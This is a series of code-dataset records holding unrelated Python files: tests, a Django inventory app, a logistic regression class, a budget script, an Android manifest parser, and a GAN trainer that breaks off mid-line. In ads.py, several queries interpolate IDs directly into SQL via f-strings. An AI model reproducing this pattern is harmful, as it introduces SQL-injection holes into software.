testing_framework(globals())\n","sub_path":"arsenal/datastructures/partition_refinement.py","file_name":"partition_refinement.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"596668966","text":"#!/usr/bin/env python\n\nimport unittest\nimport template_creator\nimport yaml\n\n\nclass TestVpcMethods(unittest.TestCase):\n\n def setUp(self):\n with open('template_config.yaml', 'r') as f:\n self.config = yaml.load(f.read())\n self.cloudformation = template_creator.Cloudformation(self.config)\n\n self.vpcnamen = {\"Value\": {\"Ref\": \"AWS::StackName\"}}\n\n def test_vpcname_output(self):\n print(self.cloudformation.vpc.vpcname.to_dict())\n self.assertDictEqual(\n self.cloudformation.vpc.vpcname.to_dict(),\n self.vpcnamen)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_VPCName_output.py","file_name":"test_VPCName_output.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"329501264","text":"from datetime import datetime\n\n\ndef get_ad(cursor, ad_id):\n cursor.execute(\n f'SELECT * FROM ad WHERE ad.id = {ad_id};'\n )\n fetched = cursor.fetchone()\n if fetched is None:\n return None\n response = dict(fetched)\n response[\"date\"] = datetime.utcfromtimestamp(int(response['date']))\n return response\n\n\ndef get_tags(cursor, ad_id):\n cursor.execute(\n 'SELECT tag.name FROM tag '\n 'JOIN adtag ON adtag.tag_id = tag.id '\n 'JOIN ad ON ad.id = adtag.ad_id '\n 'WHERE ad.id = ?;', (ad_id,)\n )\n return [dict(row)['name'] for row in cursor.fetchall()]\n\n\ndef get_car(cursor, car_id):\n cursor.execute(\n f'SELECT * FROM car WHERE car.id = {car_id};'\n )\n response = dict(cursor.fetchone())\n del (response['id'])\n return response\n\n\ndef get_colors(cursor, car_id):\n cursor.execute(\n 'SELECT color.id, color.name, color.hex '\n 'FROM color '\n 'JOIN carcolor ON carcolor.color_id = color.id '\n 'JOIN car ON car.id = carcolor.car_id '\n 'WHERE car.id = ?;', (car_id,)\n )\n return [dict(row) for row in cursor.fetchall()]\n\n\ndef get_images(cursor, car_id):\n cursor.execute(\n 'SELECT image.title, image.url '\n 'FROM image '\n 'JOIN carimage ON carimage.image_id = image.id '\n 'JOIN car on car.id = carimage.car_id '\n 'WHERE car.id = ?;', (car_id,)\n )\n return [dict(row) for row in cursor.fetchall()]\n\n\nclass AdsServices:\n def __init__(self, connection):\n self.con = connection\n\n def get_ad__account_info(self, ad_id):\n cursor = self.con.cursor()\n cursor.execute(\n 'SELECT seller_id, car_id, account_id '\n 'FROM ad '\n 'JOIN seller ON seller.id = ad.seller_id '\n 'JOIN account ON account.id = seller.account_id '\n 'WHERE ad.id = ?',\n (ad_id,)\n )\n info = dict(cursor.fetchone())\n account_id = info.get('account_id')\n seller_id = info.get('seller_id')\n car_id = info.get('car_id')\n return account_id, seller_id, car_id\n\n def delete_ad(self, ad_id, car_id):\n cursor = self.con.cursor()\n cursor.execute(\n f'DELETE FROM ad WHERE id = {ad_id};'\n )\n cursor.execute(\n f'DELETE FROM car WHERE id = {car_id};'\n )\n cursor.execute(\n f'DELETE FROM carcolor WHERE car_id = {car_id};'\n )\n cursor.execute(\n f'DELETE FROM adtag WHERE ad_id = {ad_id}'\n )\n cursor.execute(\n f'SELECT id from carimage WHERE car_id = {car_id}'\n )\n images_id_list = [tuple(dict(row).values()) for row in cursor.fetchall()]\n cursor.executemany(\n f'DELETE FROM image WHERE id = ?;', images_id_list\n )\n cursor.execute(\n f'DELETE FROM carimage WHERE car_id = {car_id}'\n )\n\n def get_one_ad(self, ad_id):\n cursor = self.con.cursor()\n response = get_ad(cursor, ad_id)\n car_id = response['car_id']\n response['tags'] = get_tags(cursor, ad_id)\n response['car'] = get_car(cursor, car_id)\n response['car']['colors'] = get_colors(cursor, car_id)\n response['car']['images'] = get_images(cursor, car_id)\n\n del (response['car_id'])\n return response\n","sub_path":"src/services/ads.py","file_name":"ads.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"482200966","text":"import numpy as np\nimport math\n\n\nclass LRC:\n def __init__(self, alpha):\n self.features = np.matrix('0')\n self.labels = np.matrix('0')\n self.weights = np.matrix('0')\n self.alpha = alpha\n self.test_data = None\n\n def get_train_data(self, data_path, ratio=0, split=0.5):\n\n \"\"\"\n Get the train set from the given file path\n\n :param data_path: the file path of data\n :param ratio: the negative samples to positive sample ratio, default equal to 0 means original data\n :param split: the train set size to test set size ratio, default equal to 0.5\n :return: (matrix, matrix), feature and label\n\n \"\"\"\n sample_data = np.loadtxt(data_path, dtype=np.float, delimiter=\",\")\n x0 = np.ones(sample_data.shape[0])\n sample_data = np.c_[x0, sample_data] # Add x0=1 for every feature vector\n\n # Get the train set and test set by split\n m, n = sample_data.shape\n if split < 0 or split >= 1:\n print(\"split is out of range.\")\n return None, None\n split_num = int(m * split)\n self.test_data = sample_data[split_num:]\n train_data = sample_data[0:split_num]\n\n # Adjust the train set to specific ratio of negative samples to positive sample\n positive_mat = np.mat([row for row in train_data if row[n - 1] > 0.5])\n negative_mat = np.mat([row for row in train_data if row[n - 1] < 0.5])\n\n positive_num = positive_mat.shape[0]\n negative_num = negative_mat.shape[0]\n\n target_negative_num = int(positive_num * ratio)\n if target_negative_num > negative_num:\n print(\"The ratio is too big.\")\n return None, None\n elif ratio == 0:\n target_sample_data = np.row_stack((positive_mat, negative_mat))\n return target_sample_data[:, 0:-1], target_sample_data[:, -1:]\n else:\n target_negative_mat = negative_mat[0:target_negative_num, :]\n target_sample_data = np.row_stack((positive_mat, target_negative_mat))\n\n return target_sample_data[:, 0:-1], target_sample_data[:, -1:]\n\n def get_test_data(self):\n features = np.mat(self.test_data[:, 0:-1])\n labels = np.mat(self.test_data[:, -1:])\n return features, labels\n\n def fit(self, x, y):\n \"\"\"\n Train the model with train set\n\n :param x: the training feature matrix\n :param y: the training label matrix\n :return: True for a successful training, otherwise return False\n \"\"\"\n if x is None:\n return False\n else:\n self.features = x\n self.labels = y\n self.__grad_descent()\n return True\n\n @staticmethod\n def sigmoid(z):\n return 1.0 / (1 + math.exp(-z))\n\n def __grad_descent(self):\n m, n = self.features.shape\n max_cycle = 600\n self.weights = np.mat(np.ones((n, 1))) # Initialize the weight vector\n sig = np.vectorize(self.sigmoid)\n\n for k in range(max_cycle):\n h = sig(self.features * self.weights)\n error = h - self.labels\n self.weights -= (self.alpha / m) * self.features.transpose() * error\n\n def predict(self, feature_set):\n \"\"\"\n Predict the labels of given data set with a trained model\n\n :param feature_set: the feature matrix\n :return: the predicted label matrix\n \"\"\"\n feature_set = feature_set.getA()\n m, n = feature_set.shape\n if n != self.weights.shape[0]:\n print(\"Wrong size of test data!\")\n else:\n predicted_labels = np.dot(feature_set, self.weights) > 0.5\n return predicted_labels.astype(int)\n\n @staticmethod\n def classification_report(expected, predicted):\n \"\"\"\n Build a text report showing the main classification metrics\n\n :param expected: 1d array-like, or label indicator array / sparse matrix\n Ground truth (correct) target values.\n :param predicted: 1d array-like, or label indicator array / sparse matrix\n Estimated targets as returned by a classifier.\n :return: null\n\n \"\"\"\n from sklearn import metrics\n print(\"Classification report for classifier :\\n%s\\n\"\n % metrics.classification_report(expected, predicted))\n print(\"Confusion matrix:\\n%s\" % metrics.confusion_matrix(expected, predicted))\n\n @staticmethod\n def classification_evaluate(expected, predicted):\n from sklearn import metrics\n confusion_matrix = metrics.confusion_matrix(expected, predicted)\n accuracy_score = confusion_matrix[1, 1]/(confusion_matrix[0, 1] + confusion_matrix[1, 1])\n return accuracy_score, metrics.recall_score(expected, predicted), metrics.f1_score(expected, predicted)\n","sub_path":"homework/LogisticReg.py","file_name":"LogisticReg.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"538862968","text":"\"\"\"Importando de rest_framework\"\"\"\r\nimport json\r\nfrom inventario.Serializers.serializers import (\r\n SoftwareSerializer, AreaSerializer, EmpleadoSerializer, UserSerializer, UserLoginSerializer)\r\nfrom inventario.models import (Software, Area, Empleado)\r\nfrom django.shortcuts import render, get_object_or_404, redirect\r\nfrom rest_framework.decorators import permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom django.contrib import messages\r\nfrom django.http import JsonResponse\r\nfrom django.contrib.auth.models import User\r\nfrom rest_framework import viewsets, mixins, status\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.views import APIView\r\nfrom django.http import QueryDict\r\nfrom django.contrib.auth import authenticate\r\nfrom django.contrib.auth import login as do_login\r\n\"\"\"Importando los serializadores y modelos a utilizar\"\"\"\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n\r\n@api_view(['GET'])\r\ndef index(request):\r\n return render(request, 'Login/Login.html')\r\n\r\n\r\ndef AreaData():\r\n queryset = Area.objects.all()\r\n return queryset\r\n\r\n\r\ndef SoftwareIndex(request):\r\n return render(request, 'Software/SC.html', {'queryarea': AreaData()})\r\n\r\n\r\ndef BSoftwareIndex(request):\r\n return render(request, 'Software/SR.html', {'queryarea': AreaData()})\r\n\r\n\r\ndef SoftwareDniEmpleado(request, dniempleado):\r\n query = Software.objects.filter(dni_empleado=dniempleado)\r\n querys = SoftwareSerializer(query, many=True)\r\n return JsonResponse(querys.data, safe=False)\r\n\r\n@login_required\r\ndef EmpleadoJson(request, idarea):\r\n query = Empleado.objects.filter(id_area=idarea)\r\n querys = EmpleadoSerializer(query, many=True)\r\n return JsonResponse(querys.data, safe=False)\r\n\r\n\r\ndef EmpleadoDetail(request, idarea):\r\n queryset2 = Empleado.objects.filter(id_area=idarea)\r\n return render(request, 'Hardware/CH.html', {'queryarea': AreaData(), 'queryempleado': queryset2})\r\n\r\n\r\ndef FormHardware(request):\r\n return render(request, 'Hardware/CH.html', {'queryarea': AreaData()})\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\ndef SoftwareGetPost(request):\r\n if request.method == 'GET':\r\n software = Software.objects.all()\r\n serializer = SoftwareSerializer(software, many=True)\r\n print(serializer.data)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n print(request.POST['nombre_software'])\r\n serializer = SoftwareSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n msg = 'El inventario de software se almaceno correctamente'\r\n messages.success(\r\n request, msg, extra_tags='col-12 alert alert-success')\r\n return redirect(\"SC\")\r\n else:\r\n messages.error(request, 'Ocurrio un error al tratar de almacenar el producto',\r\n extra_tags='col-12 alert alert-danger')\r\n return redirect(\"SC\")\r\n\r\n\r\n\"\"\"@api_view(['GET','PUT','DELETE'])\r\ndef SoftwareUpdateDelete(request,id):\r\n try:\r\n software=Software.objects.get(id_software=id)\r\n print(software.data)\r\n except:\r\n return response(status=status.HTTP_404_NOT_FOUND)\r\n if request.method == 'GET':\r\n serializer = SoftwareSerializer(software)\r\n return Response(serializer.data)\r\n if request.method == 'PUT':\r\n serializer = SoftwareSerializer(software, data=request.DATA)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n else:\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n elif request.method == 'DELETE':\r\n software.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\"\"\"\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\ndef SoftwareGetUpdate(request, idsoftware):\r\n try:\r\n software = Software.objects.get(id_software=idsoftware)\r\n except:\r\n return JsonResponse({\"success\": 404}, status=404)\r\n if request.method == 'GET':\r\n area = software.dni_empleado.id_area\r\n sarea = AreaSerializer(area, many=False)\r\n empleado = software.dni_empleado\r\n sempleado = EmpleadoSerializer(empleado, many=False)\r\n serializer = SoftwareSerializer(software)\r\n querys = serializer.data\r\n return render(request, 'Software/SU.html', {'querys': serializer.data, 'queryarea': AreaData(), 'area': sarea.data, 'empleado': sempleado.data})\r\n elif request.method == 'POST':\r\n print(\"estas en post\")\r\n serializer = SoftwareSerializer(software, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n messages.success(request, 'El software se actualizo correctamente',\r\n extra_tags='col-12 alert alert-success')\r\n return redirect('SU', idsoftware=idsoftware)\r\n else:\r\n messages.error(request, 'Ocurrio un error al tratar de almacenar el producto',\r\n extra_tags='col-12 alert alert-danger')\r\n return redirect('SU', idsoftware=idsoftware)\r\n\r\n\r\n@api_view(['POST'])\r\ndef SoftwareDelete(request, idsoftware):\r\n print(\"idsoftware\"+idsoftware)\r\n try:\r\n software = Software.objects.get(id_software=idsoftware)\r\n except:\r\n return JsonResponse({\"success\": 404}, status=404)\r\n if request.method == 'POST':\r\n software.delete()\r\n print(\"elimino\")\r\n return JsonResponse({\"success\": True}, status=200)\r\n return JsonResponse({\"success\": True}, status=400)\r\n\r\n\r\nclass SoftwareView(mixins.CreateModelMixin, viewsets.GenericViewSet):\r\n serializer_class = SoftwareSerializer\r\n queryset = Software.objects.all()\r\n\r\n\r\nclass AreaView(viewsets.ModelViewSet):\r\n serializer_class = AreaSerializer\r\n queryset = Area.objects.all()\r\n\r\n\r\nclass UserView(viewsets.ModelViewSet):\r\n serializer_class = UserSerializer\r\n queryset = User.objects.all()\r\n\r\n\r\nclass UserLoginView(APIView):\r\n\r\n def post(self, request):\r\n user=authenticate(username=request.POST.get('username'),password=request.POST.get('password'))\r\n print(user)\r\n if user is not None:\r\n do_login(request,user)\r\n return redirect('PCC')\r\n else:\r\n messages.error(request, 'El usuario o la contraseña son invalidos', extra_tags='col-12 alert alert-danger')\r\n return redirect('index')\r\n '''lista={'username':request.POST.get('username'),'password':request.POST.get('password')}\r\n serializer = UserLoginSerializer(data=request.data)\r\n if serializer.is_valid():\r\n user, token = serializer.save()\r\n print('usuario', user)\r\n print('token', token)\r\n data = {\r\n 'status': 'ok',\r\n 'token': token\r\n }\r\n return JsonResponse({\"token\":token})\r\n messages.error(request, 'El usuario o la contraseña son invalidos',\r\n extra_tags='col-12 alert alert-danger')\r\n return redirect('index')'''\r\n","sub_path":"app/inventario/Views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"167222812","text":"import os\nimport csv\n\nbudget_csv = os.path.join(\"Resources\", \"budget_data.csv\")\nmonths = [] #stores all the months\ntotal = int(0)\nprofit = [] #stores all the profits/losses\nchange = [] #change between each month\ntotal_change = int(0)\nwith open(budget_csv,'r') as csvfile:\n budget_data = csv.reader(csvfile, delimiter=\",\")\n\n csv_header = next(budget_data)\n #print(f\"CSV Header: {csv_header}\")\n\n for row in budget_data:\n months.append(row[0])\n profit.append(int(row[1]))\n total = total + int(row[1])\n \n\nfor x in range(len(profit)-1):\n difference = profit[x + 1] - profit[x] \n change.append(difference)\n\nfor x in range(len(change)): #average of change between months\n total_change = total_change + change[x] #finds total of the change between months\n length = len(change)\n average = round(float(total_change/(length)),2)\n\n\n\ntotal_months = len(months)\n\nmax = max(change)\nmin = min(change)\n\n#finds the corresponding month for max and min change\nmax_month = change.index(max) + 1\nmin_month = change.index(min) + 1\n#print(max_month)\n#print(months)\n#print(profit)\n#print(change)\n\n#print(len(profit))\n#print(len(change))\n#print(months[25])\n#print(change.index(max))\n\n#----------------------------------------------\n#output\nprint(\"Financial Analysis\")\nprint(\"-------------------------\")\n\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: ${total}\")\nprint(f\"Average Change: ${average}\")\nprint(f\"Greatest Increase in Profits: {months[max_month]} (${max})\")\nprint(f\"Greatest Decrease in Profits: {months[min_month]} (${min})\")\n\n\n\n# Specify the file to write to\noutput_path = os.path.join(\"Analysis\", \"bank.csv\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w', newline='') as csvfile:\n\n # Initialize csv.writer\n csvwriter = csv.writer(csvfile, delimiter=' ')\n\n # Write the first row\n csvwriter.writerow([\"Financial Analysis\"])\n\n # Write the second row\n csvwriter.writerow(\"-------------------------\")\n csvwriter.writerow([f\"Total Months: {total_months}\"])\n csvwriter.writerow([f\"Total: ${total}\"])\n csvwriter.writerow([f\"Average Change: ${average}\"])\n csvwriter.writerow([f\"Greatest Increase in Profits: {months[max_month]} (${max})\"])\n csvwriter.writerow([(f\"Greatest Decrease in Profits: {months[min_month]} (${min})\")])\n","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"231556160","text":"#\n# Copyright (C) 2016 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"This file provides all Pack element related parsing.\"\"\"\n\nimport os\n\nfrom project import acl\nfrom project import common\n\n\nWILDCARD = '*'\n\n\nclass Pack(object):\n \"\"\"Pack objects represent the element.\"\"\"\n def __init__(self, namespace, name):\n self._namespace = namespace\n self._name = name\n self._depends = {'requires':[], 'provides':[]}\n self._copies = []\n self._configs = []\n self._defaults = DefaultCopy()\n self._origin = common.Origin()\n\n def _alias_puidlist(self, old_ns, new_ns, puidlist):\n \"\"\"Takes a list of pack ids and changes their prefix in a new list.\"\"\"\n new_list = []\n for puid in puidlist:\n if puid.startswith('{}.'.format(old_ns)):\n new_list += ['{}{}'.format(new_ns, puid[len(old_ns):])]\n else:\n new_list += [puid]\n return new_list\n\n def alias(self, new_ns):\n \"\"\"Swap out the namespace prefix in all absolute ids.\"\"\"\n self._depends['requires'] = self._alias_puidlist(\n self._namespace, new_ns, self._depends['requires'])\n self._depends['provides'] = self._alias_puidlist(\n self._namespace, new_ns, self._depends['provides'])\n self._namespace = new_ns\n\n @property\n def namespace(self):\n return self._namespace\n\n @property\n def origin(self):\n \"\"\"Returns string indicating where the pack was defined.\"\"\"\n return self._origin\n\n @property\n def uid(self):\n \"\"\"Returns the fully qualified unique pack name\"\"\"\n return '{}.{}'.format(self._namespace, self._name)\n\n @property\n def name(self):\n \"\"\"Returns the namespace-local pack name.\"\"\"\n return self._name\n\n @property\n def requires(self):\n \"\"\"Returns a list of required fully qualified pack unique names.\"\"\"\n return self._depends['requires']\n\n @property\n def provides(self):\n \"\"\"Returns a list of provided fully qualified pack virtual names.\"\"\"\n return self._depends['provides']\n\n def add_provides(self, virtual_name):\n # Duplicates are ignored.\n if virtual_name in self._depends['provides']:\n return\n self._depends['provides'].append(virtual_name)\n\n @property\n def defaults(self):\n \"\"\"Returns the DefaultCopy node if defined.\"\"\"\n return self._defaults\n\n @defaults.setter\n def defaults(self, default_copy):\n self._defaults = default_copy\n\n @property\n def copies(self):\n \"\"\"Returns the list of child Copy objects.\"\"\"\n return self._copies\n\n def add_copy(self, copy):\n self._copies.append(copy)\n\n @property\n def configs(self):\n \"\"\"Returns the list of child Config objects.\"\"\"\n return self._configs\n\n def __repr__(self):\n s = '{}{}{}{}{}'.format(\n self._name,\n ''.join([''.format(p)\n for p in self._depends['provides']]),\n ''.join([''.format(p)\n for p in self._depends['requires']]),\n ''.join([str(c) for c in self._copies]),\n self._configs or '',\n self._defaults\n )\n return s\n\n def load(self, ele):\n \"\"\"Loads the Pack from a XML element node.\"\"\"\n ele.limit_attribs(['name'])\n # Override any pre-defined name.\n self._name = ele.get_attrib('name')\n self._origin = ele.origin.copy()\n for child in ele.findall('defaults'):\n self._defaults.load(child)\n for pack_op in self._depends:\n for child in ele.findall(pack_op):\n child.limit_attribs(['pack'])\n n = child.get_attrib('pack')\n if '.' not in n:\n raise common.LoadErrorWithOrigin(\n child.origin,\n ('<{}> must supply fully qualified pack names: '\n '{}'.format(pack_op, n)))\n self._depends[pack_op].append(n)\n for child in ele.findall('copy'):\n c = Copy(self)\n c.load(child)\n self._copies.append(c)\n for child in ele.findall('config'):\n c = Config(self)\n c.load(child)\n self._configs.append(c)\n\n\nclass CopyType(object):\n DIR = 1\n FILE = 2\n GLOB = 3\n @staticmethod\n def get(path):\n if path.endswith(os.sep):\n return CopyType.DIR\n if path.endswith(WILDCARD):\n return CopyType.GLOB\n return CopyType.FILE\n\n\nclass DefaultCopy(object):\n def __init__(self):\n self._origin = common.Origin()\n self._dst = None\n self._acl = acl.FileAcl(None)\n\n def load(self, ele):\n ele.limit_attribs([])\n copies = ele.findall('copy')\n if len(copies) == 0:\n return\n if len(copies) != 1:\n raise common.LoadErrorWithOrigin(\n ele.origin, 'Only one copy element may be defined in defaults.')\n ele = copies[0]\n ele.limit_attribs(['to'])\n # TODO(wad) Here and elsewhere, ensure attrib only\n # has keys that are explicitly supported.\n self._origin = ele.origin.copy()\n if 'to' in ele.attrib:\n self._dst = ele.get_attrib('to')\n if CopyType.get(self._dst) != CopyType.DIR:\n raise common.LoadErrorWithOrigin(\n self._origin,\n ('default copy destinations must be directories, suffixed '\n 'by a {}'.format(common.pathsep)))\n acls = ele.findall('set-acl')\n if len(acls) > 1:\n raise common.LoadErrorWithOrigin(\n ele.origin, 'Only one set-acl default may be set')\n if len(acls):\n self._acl.load(acls[0])\n\n @property\n def dst(self):\n return self._dst\n\n @property\n def acl(self):\n return self._acl\n\n def __repr__(self):\n return '{}'.format(\n self._dst or '', self._acl)\n\n\nclass Copy(object):\n def __init__(self, pack, dst='', dst_type=CopyType.FILE, src='',\n src_type=CopyType.FILE):\n self._pack = pack\n self._dst = dst\n self._dst_type = dst_type\n # Set the default \"to\" if the pack has none.\n if pack is not None and pack.defaults is not None:\n if pack.defaults.dst is not None:\n self._dst = pack.defaults.dst\n self._dst_type = CopyType.get(self._dst)\n self._src = src\n self._src_type = src_type\n self._recurse = False\n self._acl = acl.FileAcl(self)\n self._origin = common.Origin()\n\n @property\n def pack(self):\n return self._pack\n\n @property\n def origin(self):\n return self._origin\n\n def load(self, ele):\n \"\"\"Loads the Copy from a XML element node (copy).\"\"\"\n ele.limit_attribs(['to', 'from', 'recurse'])\n # Always get to from the element.\n if 'to' in ele.attrib:\n self._dst = ele.get_attrib('to')\n # Fail if there is no 'to' default or defined 'to'.\n if self._dst == '':\n self._dst = ele.get_attrib('to')\n\n self._dst_type = CopyType.get(self._dst)\n self._src = ele.get_attrib('from')\n self._src_type = CopyType.get(self._src)\n recurse = (ele.attrib.get('recurse') or 'false').lower()\n self._origin = ele.origin.copy()\n if recurse == 'true':\n self._recurse = True\n elif recurse == 'false':\n self._recurse = False\n else:\n raise common.LoadErrorWithOrigin(\n self._origin, ' recurse element not \"true\" or \"false\"')\n self._recurse = recurse == 'true' or False\n\n acls = ele.findall('set-acl')\n if len(acls) > 1:\n raise common.LoadErrorWithOrigin(\n ele.origin, 'Only one element is allowed per ')\n if len(acls):\n self._acl.load(acls[0])\n self._reconcile_paths()\n\n def _reconcile_paths(self):\n if not self._dst.startswith(common.pathsep):\n raise common.LoadErrorWithOrigin(\n self._origin,\n (' destinations must be absolute (start with a {}): '\n '{}'.format(common.pathsep, self._dst)))\n if self._recurse:\n # Ensure recursive destinations are paths and require a trailing\n # slash. This is pedantic, but it is better to start explicit.\n if not self._dst_type == CopyType.DIR:\n raise common.LoadErrorWithOrigin(\n self._origin,\n ' specifies recursion but the destination \"{}\" '\n 'does not have a trailing path separator'.format(self._dst))\n # Similarly, recursive sources must be labeled as paths using\n # trailing slashes or end with a wildcard (*) allowing a path to be\n # copied or the contents of a path.\n if self._src_type == CopyType.FILE:\n raise common.LoadErrorWithOrigin(\n self._origin,\n ' specifies recursion but the source \"{}\" '\n 'does not have a trailing path separator or '\n 'wildcard'.format(self._src))\n # If we're copying the path, we could translate it into a more\n # specific glob here, but there is no benefit using normal python\n # helpers.\n\n # For file copies into a path, compute the final path.\n if not self._recurse:\n if (self._dst_type == CopyType.DIR\n and self._src_type == CopyType.FILE):\n # foo/bar.txt -> /system/bin/ becomes /system/bin/bar.txt\n self._dst = common.path_join(self._dst,\n common.basename(self._src))\n self._dst_type = CopyType.FILE\n elif (self._dst_type == CopyType.DIR\n and self._src_type == CopyType.DIR):\n # foo/bar/ -> /system/blah becomes /system/blah/bar/\n # (GLOBs are used to copy contents to the same name.)\n self._dst = common.path_join(\n self._dst,\n common.basename(self._src.rstrip(common.pathsep)))\n elif (self._src_type == CopyType.GLOB\n and not self._dst_type == CopyType.DIR):\n raise common.LoadErrorWithOrigin(\n self._origin,\n ' source \"{}\" uses a wildcard but the destination '\n '\"{}\" does not have a trailing path separator'.format(\n self._src, self._dst))\n\n # Absolutize the sources based on the defining file.\n # This also means that sources must use host separators.\n # TODO(wad) Consider allowing a base to be set by Packs on\n # inclusion of a file.\n self._src = common.path_to_host(self._src)\n if not os.path.isabs(self._src):\n base_path = os.path.dirname(self._origin.source_file)\n self._src = os.path.abspath(os.path.join(base_path, self._src))\n\n # Note, if we end up creating an image root, then we can also absolutize\n # the destinations (excepting wildcards).\n\n @property\n def src(self):\n \"\"\"Returns the path on the caller's client.\"\"\"\n return self._src\n\n @src.setter\n def src(self, src):\n self._src = src\n\n @property\n def dst(self):\n return self._dst\n\n @dst.setter\n def dst(self, dst):\n self._dst = dst\n\n @property\n def src_type(self):\n return self._src_type\n\n @property\n def dst_type(self):\n return self._dst_type\n\n @src_type.setter\n def src_type(self, t):\n self._src_type = t\n\n @dst_type.setter\n def dst_type(self, t):\n self._dst_type = t\n\n @property\n def recurse(self):\n return self._recurse\n\n @recurse.setter\n def recurse(self, r):\n self._recurse = r\n\n @property\n def acl(self):\n return self._acl\n\n @acl.setter\n def acl(self, acl_):\n self._acl = acl_\n\n def __repr__(self):\n return '{}'.format(\n self._dst, self._src, self._recurse, self._acl)\n\n\nclass ConfigType(object):\n UNKNOWN = 0\n KERNEL_FRAGMENT = 1\n SELINUX_POLICY = 2\n NAMES = {'kernel-fragment': KERNEL_FRAGMENT,\n 'sepolicy': SELINUX_POLICY}\n\n @staticmethod\n def get(type_name):\n if type_name in ConfigType.NAMES:\n return ConfigType.NAMES[type_name]\n return ConfigType.UNKNOWN\n\n\nclass Config(object):\n def __init__(self, pack):\n self._pack = pack\n self._path = ()\n self._type = ConfigType.UNKNOWN\n self._origin = common.Origin()\n\n @property\n def pack(self):\n return self._pack\n\n def load(self, ele):\n \"\"\"Loads the Config from a XML element node (config).\"\"\"\n ele.limit_attribs(['path', 'type'])\n self._origin = ele.origin.copy()\n self._path = common.path_to_host(ele.get_attrib('path'))\n if not isinstance(self._path, basestring):\n raise common.LoadErrorWithOrigin(ele.origin,\n 'Failed to parse \"path\" attribute')\n\n # Anchor a relative path to the origin's location.\n if not os.path.isabs(self._path):\n base_path = os.path.dirname(self._origin.source_file)\n self._path = os.path.abspath(os.path.join(base_path, self._path))\n if self._path.endswith(os.sep):\n raise common.LoadErrorWithOrigin(\n self._origin,\n '@path must specify a file and not a directory: {}'.format(\n self._path))\n self._type = ConfigType.get(ele.get_attrib('type'))\n if self._type == ConfigType.UNKNOWN:\n raise common.LoadErrorWithOrigin(\n self._origin,\n '@type must be one of {}'.format(ConfigType.NAMES.keys()))\n\n @property\n def path(self):\n return self._path\n\n def __repr__(self):\n return '= x >= start_min else 0)\n count_end.apply_(lambda x: 1 if end_max >= x >= end_min else 0)\n\n valid_solutions = Tensor([1 if s == 1 and e == 1 else 0\n for s, e in zip(count_start, count_end)])\n\n return count_start.mean(), count_end.mean(), valid_solutions.mean()\n\n# Start training\nfixed_noise = torch.randn(128, latent_size, 1, 1, device=device)\n\nhistory = {'lossD': [], 'lossG': [], 'avgStart': [], 'avgEnd': [],\n 'valid': [], 'validHist': [], 'imgs': [],'epoch': []}\n\nfor epoch in range(n_epochs):\n\n for i, data in enumerate(loader['train']):\n\n x_real = data['moves'].type(Tensor)\n\n if epoch == 0 and i == 0:\n viz.images(\n x_real[:16].flip(2),\n opts=dict(title='Epoch' + str(epoch), width=1000, height=250)\n )\n\n netD.zero_grad()\n\n # Creamos un set de números aleatorios y producimos una imagen con ellos\n z = torch.randn(x_real.size(0), latent_size, 1, 1, device=device)\n x_fake = netG(z)\n\n # Computamos los penalty (definidos en las funciones anteriores)\n penalty = 0.1 * channel_penalty(x_fake, start_max, end_max, start_min, end_min) \\\n + 0.1 * duplicate_penalty(x_fake) if epoch > 100 else torch.zeros([x_real.size(0), 1], device=device)\n\n\n #Hacemos la predicción de la imagen con el discriminador para el real y el fake\n out_real = netD((x_real, torch.zeros([x_real.size(0), 1], device=device)))\n out_fake = netD((x_fake, penalty))\n\n #Anadimos la loss function interpolando entre la media del error de la real y de fake\n # introducimos el valor del penalty\n lossD = torch.mean(out_fake) - torch.mean(out_real) \\\n + lmbda * gradient_penalty(netD, x_real.data, x_fake.data) \\\n\n #Hacemos el backward propagation y damos un step en la dirección del gradiente \n # del discriminador\n lossD.backward(retain_graph=True)\n optimizerD.step()\n\n # En un número ciclico de veces entrenamos el Generador\n if i % n_critic == 0:\n\n netG.zero_grad()\n\n # Creamos una imagen falsa\n x_fake = netG(z)\n\n #Calculamos los penalties a esta imagen\n penalty = 0.1 * channel_penalty(x_fake, start_max, end_max, start_min, end_min) \\\n + 0.1 * duplicate_penalty(x_fake) if epoch > 100 else torch.zeros([x_real.size(0), 1], device=device)\n\n # Calculamos el error del discriminador anadiento tanto la imagen falsa como el penalty\n out_fake = netD((x_fake, penalty))\n\n lossG = 